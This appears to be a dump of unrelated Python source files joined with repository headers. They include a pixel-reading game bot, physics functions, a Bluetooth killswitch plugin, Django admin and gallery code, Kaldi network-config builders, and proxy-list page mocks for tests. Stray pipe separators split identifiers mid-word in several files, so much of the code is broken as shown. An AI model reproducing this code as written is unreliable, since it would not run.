'browser_ | search | ':0xAA,
'browser_favorites':0xAB,
'browser_start_and_home':0xAC,
'volume_mute':0xAD,
'volume_Down':0xAE,
'volume_up':0xAF,
'next_track':0xB0,
'previous_track':0xB1,
'stop_media':0xB2,
'play/pause_media':0xB3,
'start_mail':0xB4,
'select_media':0xB5,
'start_application_1':0xB6,
'start_application_2':0xB7,
'attn_key':0xF6,
'crsel_key':0xF7,
'exsel_key':0xF8,
'play_key':0xFA,
'zoom_key':0xFB,
'clear_key':0xFE,
'+':0xBB,
',':0xBC,
'-':0xBD,
'.':0xBE,
'/':0xBF,
'`':0xC0,
';':0xBA,
'[':0xDB,
'\\':0xDC,
']':0xDD,
"'":0xDE,
'`':0xC0}
#onscreen key positions with default window size and 1920x1080 resolution
POSITIONS = {'q': (268, 450),
'w': (354, 449),
'e': (449, 451),
'r': (540, 447),
't': (628, 447),
'y': (713, 451),
'u': (803, 447),
'i': (893, 453),
'o': (990, 451),
'p': (1081, 450),
'a': (318, 532),
's': (405, 528),
'd': (493, 530),
'f': (584, 529),
'g': (670, 525),
'h': (764, 531),
'j': (861, 536),
'k': (942, 532),
'l': (1035, 524),
'z': (366, 613),
'x': (454, 609),
'c': (542, 618),
'v': (640, 615),
'b': (724, 605),
'n': (818, 614),
'm': (908, 613)}
#do a leftclick
def mouseClick():
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)
time.sleep(.1)
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)
print "Left Click." #completely optional. But nice for debugging purposes.
#position mouse at cords (x, y)
def mousePos(cord):
win32api.SetCursorPos((pad_x + cord[0], pad_y + cord[1]))
#get coordinates of cursor
def get_cords():
x,y = win32api.GetCursorPos()
x = x - pad_x
y = y - pad_y
print x,y
#press a specific key
def pressKey(*args):
'''
one press, one release.
accepts as many arguments as you want. e.g. press('left_arrow', 'a','b').
'''
for i in args:
win32api.keybd_event(VK_CODE[i], 0,0,0)
time.sleep(.05)
win32api.keybd_event(VK_CODE[i],0 ,win32con.KEYEVENTF_KEYUP ,0)
#grab game with given windowsize and offset
def screenGrab():
box = (pad_x, pad_y, pad_x + window_x, pad_y + window_y)
im = ImageGrab.grab(box)
##im.save(os.getcwd() + '\\Snap__' + str(int(time.time())) +'.png', 'PNG')
return im
#initialize new game (Focus game)
def startGame():
#location of first menu
mousePos((628, 146))
mouseClick()
time.sleep(.1)
#Spacebar to skip intro
time.sleep(.1)
pressKey('spacebar')
#location of first menu
mousePos((628, 146))
mouseClick()
time.sleep(.1)
#Function to check the keys array for red keys
def checkKeys(image):
for pos in POSITIONS:
colour = image.getpixel(POSITIONS[pos])
if (colour[2] > 50):
#white do nothing if not game over
if (colour[0] == 255 & colour[1] == 255 & colour[2] == 255):
global gameover
gameover = True
return
elif (colour[0] > 250 & colour[1] < 180 ):
#red key press key
print pos + " is red"
pressKey(pos)
if debug:
mousePos(POSITIONS[pos]) #place mouse at key position for debugging
if prove:
#save make a area box containing the hit in the center
box = (POSITIONS[pos][0] - 10, POSITIONS[pos][1] - 10, POSITIONS[pos][0] + 10, POSITIONS[pos][1] + 10)
im = image.crop(box)
im.save(os.getcwd() + '\\' + folder + '\\Snap__' + pos + '_' + str(int(round(time.time() * 1000))) +'.png', 'PNG')
print "prove saved in folder"
print pos + " is " + str(colour)
else:
#green key do nothing
if debug:
print pos + " is " + str(colour)
#Main loop, prepares game and checks the keys
def main():
if debug:
mousePos(POSITIONS['v'])
print str(screenGrab().getpixel(POSITIONS['v']))
if prove:
if not os.path.exists(os.getcwd() + '\\' + folder):
os.makedirs(os.getcwd() + '\\' + folder)
else:
print "path already exists"
return
print "Starting new Game"
startGame()
print "Game Started"
while not gameover:
checkKeys(screenGrab())
time.sleep(.1)
if debug:
print "Finished with checking Keys"
print "Game Over"
if __name__ == '__main__':
main() |
LorenzoBi/computational_physics | assignments/1/report/code/math_functions.py | Python | mit | 3,299 | 0.001516 | '''
This is the code containing the the mathematical functions used for the
assignment
'''
import numpy as np
# cotangent
def cot(x):
return np.cos(x) / np.sin(x)
#The rooted equation in the finite well calculation
def rooted_equation(x, Rsquared=36):
return np.sqrt(Rsquared - x ** 2)
# x*tan(x)
def simmetric_state(x):
return x * np.tan(x)
# - x * cot(x)
def antisimmetric_state(x):
if np.sin(x) == 0 and - x * (np.cos(x)) > 0:
return np.inf
elif np.sin(x) == 0 and - x * (np.cos(x)) < 0:
return - np.inf
return - x * (np.cos | (x) / np.sin(x))
# sqrt(r**2 - x**2) - x*tan(x)
def simmetric_constraint(x, Rsquared=36):
return rooted_equation(x, Rsquared) - simmetric_state(x)
# sqrt(r**2 - x**2) + x*cot(x)
def antisimmetric_constraint(x, Rsquared=36):
return rooted_equation(x, Rsquared) - ant | isimmetric_state(x)
# derivative of sqrt(r**2 - x**2) - x*tan(x)
def d_simmetric_costraint(x, Rsquared=36):
return - x / np.sqrt(36 - x ** 2) - np.tan(x) - x / (np.cos(x) ** 2)
# derivative of sqrt(r**2 - x**2) + x*cot(x)
def d_antisimmetric_constraint(x, Rsquared=36):
return - x / np.sqrt(36 - x ** 2) + cot(x) - x / (np.sin(x) ** 2)
# simm_number stands for simmetric_costraint with the given number
# I admit it is not good looking but I found it difficult to pass in
# find_zero a function with a given parameter. If this were possible they
# would be needed just the previous for function.
def simm_10(x):
return simmetric_constraint(x, Rsquared=10)
def simm_100(x):
return simmetric_constraint(x, Rsquared=100)
def simm_1000(x):
return simmetric_constraint(x, Rsquared=1000)
def simm_10000(x):
return simmetric_constraint(x, Rsquared=10000)
def simm_100000(x):
return simmetric_constraint(x, Rsquared=100000)
def simm_1000000(x):
return simmetric_constraint(x, Rsquared=1000000)
def simm_1(x):
return simmetric_constraint(x, Rsquared=1)
def simm_40(x):
return simmetric_constraint(x, Rsquared=40)
def simm_60(x):
return simmetric_constraint(x, Rsquared=60)
def simm_5(x):
return simmetric_constraint(x, Rsquared=5)
def simm_20(x):
return simmetric_constraint(x, Rsquared=20)
def simm_80(x):
return simmetric_constraint(x, Rsquared=80)
# just the function used to calculate the normalization
# radial stands for radial part of the wave function
# angular for the angular part.
# n and l specify the quantic numbers
def radial_n2_l1(x):
return float(1) / 24 * x ** 4 * np.exp(-x)
def radial_n3_l1(x):
return (1. / 6.) ** 3 * ((2. * x) / 3.) ** 4 * (4 - (2. * x) / 3.) ** 2 * np.exp(-(2. * x) / 3.)
def radial_n3_l2(x):
return (1. / (5. * 6. ** 3)) * ((2. * x) / 3.) ** 6 * np.exp(-(2. * x) / 3.)
def polar_n2o3_l1(x):
return (3. * x ** 2) / (4. * np.pi)
def polar_n3_l2(x):
return (5. / (16. * np.pi)) * (3 * x ** 2 - 1) ** 2
# Used in the interals for the A_33 and F
def radial_n2_l1_int(x):
return x ** 2 * radial_n2_l1(x)
def radial_n3_l1_int(x):
return x ** 2 * radial_n3_l1(x)
def radial_n3_l2_int(x):
return x ** 2 * radial_n3_l2(x)
def polar_n3_l2_int(x):
return 2 * np.pi * (3 * x ** 2 - 1) * polar_n3_l2(x)
def polar_n2o3_l1_int(x):
return 2 * np.pi * (3 * x ** 2 - 1) * polar_n2o3_l1(x)
|
antoinecarme/pyaf | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_MovingAverage_Seasonal_WeekOfYear_AR.py | Python | bsd-3-clause | 167 | 0.047904 | import tests.mod | el_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Integration'] , ['MovingAver | age'] , ['Seasonal_WeekOfYear'] , ['AR'] ); |
nmercier/linux-cross-gcc | linux/lib/python2.7/dist-packages/blueman/plugins/applet/KillSwitch.py | Python | bsd-3-clause | 4,342 | 0.004606 | from gi.repository import GObject
import dbus
from blueman.Functions import *
from blueman.main.SignalTracker import SignalTracker
from blueman.plugins.AppletPlugin import AppletPlugin
from blueman.main.KillSwitchNG import KillSwitchNG, RFKillType, RFKillState
try:
import blueman.main.KillSwitch as _KillSwitch
except:
pass
class KillSwitch(AppletPlugin):
__author__ = "Walmis"
__description__ = _(
"Toggles a platform Bluetooth killswitch when Bluetooth power state changes. Useless with USB dongles.")
__depends__ = ["PowerManager", "StatusIcon"]
__icon__ = "system-shutdown"
__options__ = {
"checked": {"type": bool, "default": False}
}
def on_load(self, applet):
self.signals = SignalTracker()
try:
self.Manager = KillSwitchNG()
self.signals.Handle(self.Manager, "switch-changed", self.on_switch_changed)
dprint("Using the new killswitch system")
except OSError as e:
dprint("Using the old killswitch system, reason:", e)
if _KillSwitch is None:
raise Exception("Failed to initialize killswitch manager")
else:
self.Manager = _KillSwitch.Manager()
if not self.get_option("checked"):
GObject.timeout_add(1000, self.check)
self.signals.Handle(self.Manager, "switch-added", self.on_switch_added)
self.signals.Handle(self.Manager, "switch-removed", self.on_switch_removed)
def on_switch_added(self, manager, switch):
if switch.type == RFKillType.BLU | ETOOTH:
dprint("killswitch registered", switch.idx)
# if manager.HardBlocked:
# self.Applet.Plugins.PowerManager.SetPowerChangeable(False)
#
# if not self.Manager.GetGlobalState():
# self.Applet.Plugins.PowerManager.SetBluetoothSta | tus(False)
#
# pm_state = self.Applet.Plugins.PowerManager.GetBluetoothStatus()
# if self.Manager.GetGlobalState() != pm_state:
# self.Manager.SetGlobalState(pm_state)
def on_switch_changed(self, manager, switch):
if switch.type == RFKillType.BLUETOOTH:
s = manager.GetGlobalState()
dprint("Global state:", s, "\nswitch.soft:", switch.soft, "\nswitch.hard:", switch.hard)
self.Applet.Plugins.PowerManager.UpdatePowerState()
self.Applet.Plugins.StatusIcon.QueryVisibility()
def on_switch_removed(self, manager, switch):
if switch.type == RFKillType.BLUETOOTH:
if len(manager.devices) == 0:
self.Applet.Plugins.StatusIcon.QueryVisibility()
def on_power_state_query(self, manager):
if self.Manager.HardBlocked:
return manager.STATE_OFF_FORCED
else:
dprint(self.Manager.GetGlobalState())
if self.Manager.GetGlobalState():
return manager.STATE_ON
else:
return manager.STATE_OFF
def check(self):
try:
if len(self.Manager.devices) == 0:
self.set_option("checked", True)
#this machine does not support bluetooth killswitch, let's unload
self.Applet.Plugins.SetConfig("KillSwitch", False)
except:
pass
def on_power_state_change_requested(self, manager, state, cb):
dprint(state)
def reply(*_):
cb(True)
def error(*_):
cb(False)
if not self.Manager.HardBlocked:
self.Manager.SetGlobalState(state, reply_handler=reply, error_handler=error)
else:
cb(True)
def on_unload(self):
self.signals.DisconnectAll()
def on_query_status_icon_visibility(self):
if self.Manager.HardBlocked:
return 1
state = self.Manager.GetGlobalState()
if state:
if isinstance(self.Manager, KillSwitchNG) and len(self.Manager.devices) > 0 and self.Applet.Manager:
return 2
return 1 # StatusIcon.SHOW
elif len(self.Manager.devices) > 0 and not state:
#if killswitch removes the bluetooth adapter, dont hide the statusicon,
#so that the user could turn bluetooth back on.
return 2 # StatusIcon.FORCE_SHOW
return 1
|
TheBlackDude/ehealth_academy | server/manage.py | Python | mit | 246 | 0 | #!/usr/bin | /env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eHA.settings")
from django.core.management import execute_from_command_line
execute_from_com | mand_line(sys.argv)
|
F483/bikesurf.org | apps/gallery/control.py | Python | mit | 2,303 | 0.002605 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Fabian Barkhau <fabian.barkhau@gmail.com> |
# License: MIT (see LICENSE.TXT file)
import os
from django.core.exceptions import PermissionDenied
from apps.gallery.models import Gallery
from apps.gallery.models import Picture
from apps.team.utils import assert_member
from apps.team import control as team_control
def can_edit(account, gallery):
return not ((gallery.team and not team_control.is_member(account, gallery | .team)) or
(not gallery.team and gallery.created_by != account))
def _assert_can_edit(account, gallery):
if not can_edit(account, gallery):
raise PermissionDenied
def delete(account, gallery):
""" Delete gallery and all pictures belonging to it. """
_assert_can_edit(account, gallery)
for picture in gallery.pictures.all():
remove(account, picture)
gallery.delete()
def remove(account, picture):
""" Remove picture from the gallery and delete the image file on server. """
gallery = picture.gallery
_assert_can_edit(account, gallery)
if gallery.primary == picture:
gallery.primary = None
gallery.updated_by = account
gallery.save()
os.remove(picture.image.path)
os.remove(picture.preview.path)
os.remove(picture.thumbnail.path)
picture.delete()
return gallery
def setprimary(account, picture):
""" Set picture as the galleries primary picture. """
gallery = picture.gallery
_assert_can_edit(account, gallery)
gallery.primary = picture
gallery.save()
def add(account, image, gallery):
""" Add a picture to the gallery. """
_assert_can_edit(account, gallery)
picture = Picture()
picture.image = image
picture.preview = image
picture.thumbnail = image
picture.gallery = gallery
picture.created_by = account
picture.updated_by = account
picture.save()
return picture
def create(account, image, team):
""" Create a new gallery. """
if team:
assert_member(account, team)
gallery = Gallery()
gallery.created_by = account
gallery.updated_by = account
gallery.team = team
gallery.save()
picture = add(account, image, gallery)
gallery.primary = picture
gallery.save()
return gallery
|
uclouvain/osis_louvain | base/signals/publisher.py | Python | agpl-3.0 | 1,579 | 0.002535 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License | - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.dispatch import Signal
compute_scores_encodings_deadlines = Signal(providing_args=[ | "offer_year_calendar"])
compute_student_score_encoding_deadline = Signal(providing_args=["session_exam_deadline"])
compute_all_scores_encodings_deadlines = Signal(providing_args=["academic_calendar"])
|
rectory-school/rectory-apps | enrichmentmanager/admin.py | Python | mit | 4,641 | 0.011635 | from datetime import date, datetime, time, timedelta
from django.contrib import admin
from django.utils import timezone
from enrichmentmanager.models import Teacher, Student, EnrichmentOption, EnrichmentSlot, EnrichmentSignup, EmailSuppression
from simple_history.admin import SimpleHistoryAdmin
class EditableUntilListFilter(admin.SimpleListFilter):
title = 'edit cutoff'
parameter_name = 'editable_until'
def lookups(self, request, model_admin):
return (
('empty', 'No edit cutoff'),
)
def queryset(self, request, queryset):
if self.value() == 'empty':
return queryset.filter(editable_until=None)
class SlotDateFilter(admin.SimpleListFilter):
title = 'slot date'
parameter_name = 'slot_date'
def lookups(self, request, model_admin):
return (
('future', 'After today'),
('past', 'Before today'),
('today', 'Today'),
)
def queryset(self, request, queryset):
if self.value() == 'future':
return queryset.filter(date__gt = date.today())
if self.value() == 'past':
return queryset.filter(date__lt = date.today())
if self.value() == 'today':
| return queryset. | filter(date = date.today())
class EnrichmentOptionInline(admin.TabularInline):
model = EnrichmentOption
class EnrichmentSlotAdmin(admin.ModelAdmin):
inlines = [EnrichmentOptionInline]
list_display = ['date', 'editable_until']
actions = ['allow_edit_until_1_10_0', 'allow_edit_until_1_12_0', 'allow_edit_until_1_14_0', 'allow_edit_until_1_17_0']
list_filter = (EditableUntilListFilter, SlotDateFilter, )
def reset_edit_time(self, queryset, days_before, time_hours_before, time_minutes_before):
for slot in queryset:
editable_date = slot.date - timedelta(days=days_before)
editable_until_notz = datetime(
editable_date.year,
editable_date.month,
editable_date.day,
time_hours_before,
time_minutes_before,
0)
editable_until = timezone.get_current_timezone().localize(editable_until_notz)
slot.editable_until = editable_until
slot.save()
def allow_edit_until_1_10_0(self, request, queryset):
self.reset_edit_time(queryset, 1, 10, 0)
def allow_edit_until_1_12_0(self, request, queryset):
self.reset_edit_time(queryset, 1, 12, 0)
def allow_edit_until_1_14_0(self, request, queryset):
self.reset_edit_time(queryset, 1, 14, 0)
def allow_edit_until_1_17_0(self, request, queryset):
self.reset_edit_time(queryset, 1, 17, 0)
allow_edit_until_1_10_0.short_description = "Allow editing until 10 AM on the day before"
allow_edit_until_1_12_0.short_description = "Allow editing until noon on the day before"
allow_edit_until_1_14_0.short_description = "Allow editing until 2 PM on the day before"
allow_edit_until_1_17_0.short_description = "Allow editing until 5 PM on the day before"
class StudentAdmin(admin.ModelAdmin):
fields = ["academic_student", "advisor", "lockout", "associated_teachers"]
search_fields = ["academic_student__first_name", "academic_student__last_name"]
readonly_fields = ("academic_student", "advisor", "associated_teachers")
search_fields = ["academic_student__first_name", "academic_student__last_name"]
def has_add_permission(self, *args, **kwargs):
return False
def has_delete_permission(self, *args, **kwargs):
return False
class TeacherAdmin(admin.ModelAdmin):
fields = ["academic_teacher", 'default_room', 'default_description']
readonly_fields = ["academic_teacher", 'default_room', 'default_description']
list_filter = ['academic_teacher__active']
def has_add_permission(self, *args, **kwargs):
return False
def has_delete_permission(self, *args, **kwargs):
return False
class EnrichmentSignupAdmin(admin.ModelAdmin):
list_filter = ['slot', 'student']
# Register your models here.
admin.site.register(Teacher, TeacherAdmin)
admin.site.register(Student, StudentAdmin)
admin.site.register(EnrichmentSlot, EnrichmentSlotAdmin)
admin.site.register(EnrichmentSignup, EnrichmentSignupAdmin)
admin.site.register(EmailSuppression) |
gabisurita/kinto-codegen-tutorial | python-client/test/test_group.py | Python | mit | 2,149 | 0.000931 | # coding: utf-8
"""
kinto
Kinto is a minimalist JSON storage service with synchronisation and sharing abilities. It is meant to be easy to use and easy to self-host. **Limitations of this OpenAPI specification:** 1. Validation on OR clauses is not supported (e.g. provide `data` or `permissions` in patch operations). 2. [Filtering](http://kinto.readthedocs.io/en/stable/api/1.x/filtering.html) is supported on any field by using `?{prefix}{field_name}={value}`. 3. [Backoff headers](http://kinto.readthedocs.io/en/stable/api/1.x/backoff.html) may occur with any response, but they are only present if the server is under in heavy load, so we cannot validate them on every request. They are listed only on the default error message. 4. [Collection schemas](http://kinto.readthedocs.io/en/stable/api/1.x/collections.html#collection-json-schema) can be provided when defining a collection, but they are not validated by this specification.
OpenAPI spec version: 1.13
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import A | piException
from swagger_client.models.group import Group
class TestGroup(unittest.TestCase):
""" Group unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testGroup(self):
"""
Test Group
"""
model = swagger_client.models.group.Group()
if __name__ == '__main | __':
unittest.main()
|
michellemorales/OpenMM | kaldi/egs/wsj/s5/steps/nnet3/components.py | Python | gpl-2.0 | 29,765 | 0.013069 | #!/usr/bin/env python
# Note: this file is part of some nnet3 config-creation tools that are now deprecated.
from __future__ import print_function
import os
import argparse
import sys
import warnings
import copy
from operator import itemgetter
def GetSumDescriptor(inputs):
sum_descriptors = inputs
while len(sum_descriptors) != 1:
cur_sum_descriptors = []
pair = []
while len(sum_descriptors) > 0:
value = sum_descriptors.pop()
if value.strip() != '':
pair.append(value)
if len(pair) == 2:
cur_sum_descriptors.append("Sum({0}, {1})".format(pair[0], pair[1]))
pair = []
if pair:
cur_sum_descriptors.append(pair[0])
sum_descriptors = cur_sum_descriptors
return sum_descriptors
# adds the input nodes and returns the descriptor
def AddInputLayer(config_lines, feat_dim, splice_indexes=[0], ivector_dim=0):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
output_dim = 0
components.append('input-node name=input dim=' + str(feat_dim))
list = [('Offset(input, {0})'.format(n) if n != 0 else 'input') for n in splice_indexes]
output_dim += len(splice_indexes) * feat_dim
if ivector_dim > 0:
components.append('input-node name=ivector dim=' + str(ivector_dim))
list.append('ReplaceIndex(ivector, t, 0)')
output_dim += ivector_dim
if len(list) > 1:
splice_descriptor = "Append({0})".format(", ".join(list))
else:
splice_descriptor = list[0]
print(splice_descriptor)
return {'descriptor': splice_descriptor,
'dimension': output_dim}
def AddNoOpLayer(config_lines, name, input):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append('component name={0}_noop type=NoOpComponent dim={1}'.format(name, input['dimension']))
component_nodes.append('component-node name={0}_noop component={0}_noop input={1}'.format(name, input['descriptor']))
return {'descriptor': '{0}_noop'.format(name),
'dimension': input['dimension']}
def AddLdaLayer(config_lines, name, input, lda_file):
return AddFixedAffineLayer(config_lines, name, input, lda_file)
def AddFixedAffineLayer(config_lines, name, input, matrix_file):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append('component name={0}_fixaffine type=FixedAffineComponent matrix={1}'.format(name, matrix_file))
component_nodes.append('component-node name={0}_fixaffine component={0}_fixaffine input={1}'.format(name, input['descriptor']))
return {'descriptor': '{0}_fixaffine'.format(name),
'dimension': input['dimension']}
def AddBlockAffineLayer(config_lines, name, input, output_dim, num_blocks):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
assert((input['dimension'] % num_blocks == 0) and
(output_dim % num_blocks == 0))
components.append('component name={0}_block_affine type=BlockAffineComponent input-dim={1} output-dim={2} num-blocks={3}'.format(name, input['dimension'], output_dim, num_blocks))
component_nodes.append('component-node name={0}_block_affine component={0}_block_affine input={1}'.format(name, input['descriptor']))
return {'descriptor' : '{0}_block_affine'.format(name),
'dimension' : output_dim}
def AddPermuteLayer(config_lines, name, input, column_map):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
permute_indexes = ",".join(map(lambda x: str(x), column_map))
components.append('component name={0}_permute type=PermuteComponent column-map={1}'.format(name, permute_indexes))
component_nodes.append('component-node name={0}_permute component={0}_permute input={1}'.format(name, input['descriptor']))
return {'descriptor': '{0}_permute'.format(name),
'dimension': input['dimension']}
def AddAffineLayer(config_lines, name, input, output_dim, ng_affine_options = "", max_change_per_component = 0.75):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
# Per-component max-change option
max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''
components.append("component | name={0}_affine type=NaturalGradientAffin | eComponent input-dim={1} output-dim={2} {3} {4}".format(name, input['dimension'], output_dim, ng_affine_options, max_change_options))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
return {'descriptor': '{0}_affine'.format(name),
'dimension': output_dim}
def AddAffRelNormLayer(config_lines, name, input, output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0, self_repair_scale = None, max_change_per_component = 0.75):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
# self_repair_scale is a constant scaling the self-repair vector computed in RectifiedLinearComponent
self_repair_string = "self-repair-scale={0:.10f}".format(self_repair_scale) if self_repair_scale is not None else ''
# Per-component max-change option
max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''
components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input['dimension'], output_dim, ng_affine_options, max_change_options))
components.append("component name={0}_relu type=RectifiedLinearComponent dim={1} {2}".format(name, output_dim, self_repair_string))
components.append("component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, output_dim, norm_target_rms))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
component_nodes.append("component-node name={0}_relu component={0}_relu input={0}_affine".format(name))
component_nodes.append("component-node name={0}_renorm component={0}_renorm input={0}_relu".format(name))
return {'descriptor': '{0}_renorm'.format(name),
'dimension': output_dim}
def AddAffPnormLayer(config_lines, name, input, pnorm_input_dim, pnorm_output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input['dimension'], pnorm_input_dim, ng_affine_options))
components.append("component name={0}_pnorm type=PnormComponent input-dim={1} output-dim={2}".format(name, pnorm_input_dim, pnorm_output_dim))
components.append("component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, pnorm_output_dim, norm_target_rms))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
component_nodes.append("component-node name={0}_pnorm component={0}_pnorm input={0}_affine".format(name))
component_nodes.append("component-node name={0}_renorm component={0}_renorm input={0}_pnorm".format(name))
return {'descriptor': '{0}_renorm'.format(name),
'dimension': pnorm_output_dim}
def AddConvolutionLayer(config_lines, name, input,
input_x_dim, input_y_dim, input_z_dim,
filt_x_dim, filt_y_dim,
filt_x_step, filt_y_step,
num_filters, input_vectorization,
param_stddev = None, bias_stddev = None,
filter_bias_file = None,
is_updatable = True):
assert(input['dimension'] == input_x_dim * input_y_dim * input_ |
pgaref/HTTP_Request_Randomizer | tests/mocks.py | Python | mit | 9,201 | 0.003695 | from httmock import urlmatch
free_proxy_expected = ['138.197.136.46:3128', '177.207.75.227:8080']
proxy_for_eu_expected = ['107.151.136.222:80', '37.187.253.39:8115']
rebro_weebly_expected = ['213.149.105.12:8080', '119.188.46.42:8080']
prem_expected = ['191.252.61.28:80', '167.114.203.141:8080', '152.251.141.93:8080']
sslproxy_expected = ['24.211.89.146:8080', '187.84.222.153:80', '41.193.238.249:8080']
@urlmatch(netloc=r'(.*\.)?sslproxies\.org$')
def sslproxy_mock(url, request):
return """<table class="table table-striped table-bordered" cellspacing="0" width="100%" id="proxylisttable">
<thead>
<tr>
<th>IP Address</th>
<th>Port</th>
<th>Code</th>
<th class='hm'>Country</th>
<th>Anonymity</th>
<th class='hm'>Google</th>
<th class='hx'>Https</th>
<th class='hm'>Last Checked</th>
</tr>
</thead>
<tbody>
<tr>
<td>24.211.89.146</td>
<td>8080</td>
<td>US</td>
<td class='hm'>United States</td>
<td>elite proxy</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>8 seconds ago</td>
</tr>
<tr>
<td>187.84.222.153</td>
<td>80</td>
<td>BR</td>
<td class='hm'>Brazil</td>
<td>anonymous</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>1 minute ago</td>
</tr>
<tr>
<td>41.193.238.249</td>
<td>8080</td>
<td>ZA</td>
<td class='hm'>South Africa</td>
<td>elite proxy</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>1 minute ago</td>
</tr>
</tbody>
<tfoot>
<tr>
<th class="input"><input type="text" /></th>
<th></th><th></th>
<th class='hm'></th>
<th></th>
<th class='hm'></th>
<th class='hx'></th>
<th class='hm'></th>
</tr>
</tfoot>
</table>
"""
@urlmatch(netloc=r'(.*\.)?free-proxy-list\.net$')
def free_proxy_mock(url, request):
return """<table border="0" cellpadding="0" cellspacing="0" id="proxylisttable"
id="proxylisttable">\n
<thead>\n
<tr>\n
<th>IP Address</th>
\n
<th>Port</th>
\n
<th>Code</th>
\n
<th>Country</th>
\n
<th>Anonymity</th>
\n
<th>Google</th>
\n
<th>Https</th>
\n
<th>Last Checked</th>
\n
</tr>
\n
</thead>
\n
<tbody>
<tr>
<td>138.197.136.46</td>
<td>3128</td>
<td>CA</td>
<td>Canada</td>
<td>anonymous</td>
<td>no</td>
<td>no</td>
<td>7 seconds ago</td>
</tr>
\n
<tr>
<td>177.207.75.227</td>
<td>8080</td>
<td>BR</td>
<td>Brazil</td>
<td>transparent</td>
<td>no</td>
<td>no</td>
<td>2 hours 21 minutes ago</td>
</tr>
\n
</tbody>
\n
<tfoot>\n
<tr>\n
<th class="input"><input type="text"/></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
</tr>
\n
</tfoot>
\n
</table>"""
@urlmatch(netloc=r'(.*\.)?proxyfor\.eu')
def proxy_for_eu_mock(url, request):
return """<table class="proxy_list">
<tr>
<th>IP</th>
<th>Port</th>
<th>Country</th>
<th>Anon</th>
<th>Speed</th>
<th> Check</th>
<th>Cookie/POST</th>
</tr>
<tr>
<td>107.151.136.222</td>
<td>80</td>
<td>United States</td>
<td>HIGH</td>
<td>1.643</td>
<td>2016-04-12 17:02:43</td>
<td>Yes/Yes</td>
</tr>
<tr>
<td>37.187.253.39</td>
<td>8115</td>
<td>France</td>
<td>HIGH</td>
<td>12.779</td>
<td>2016-04-12 14:36:18</td>
| <td>Yes/Yes</td>
</tr>
</table>"""
@urlmat | ch(netloc=r'(.*\.)?rebro\.weebly\.com$')
def rebro_weebly_mock(url, request):
return """<div class="paragraph" style="text-align:left;"><strong><font color="#3ab890" size="3"><font
color="#d5d5d5">IP:Port</font></font></strong><br/><font
size="2"><strong><font color="#33a27f">213.149.105.12:8080<br/>119.188.46.42:8080</font></strong></font><br/><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font size="3"><font color="#3ab890">Country</font></font></strong></font><font size="2">
<br />Montenegro<br />China<br /></font><br /><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font color="#3ab890" size="3">Status</font></strong></font><br /><font size="2">
Elite & Anonymous<br />Elite & Anonymous<br /></font><br /><span></span>
</div>
"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com')
def prem_mock(url, request):
return """
<head>
<script src="/js/test.js"></script>
</head>
<div id="proxylist">\n
<tr class="anon">\n
<th><a href="/list/ip-address-01.htm" title="Proxy List sorted by ip address">IP address</a></th>
\n
<th><a href="/list/" title="Proxy List sorted by anonymity level">Anonymity</a></th>
\n
<th><a href="/list/time-01.htm" title="Proxy List sorted by updated time">Checked</a></th>
\n
<th><a href="/list/type-01.htm" title="Proxy list sorted by country">Country</a></th>
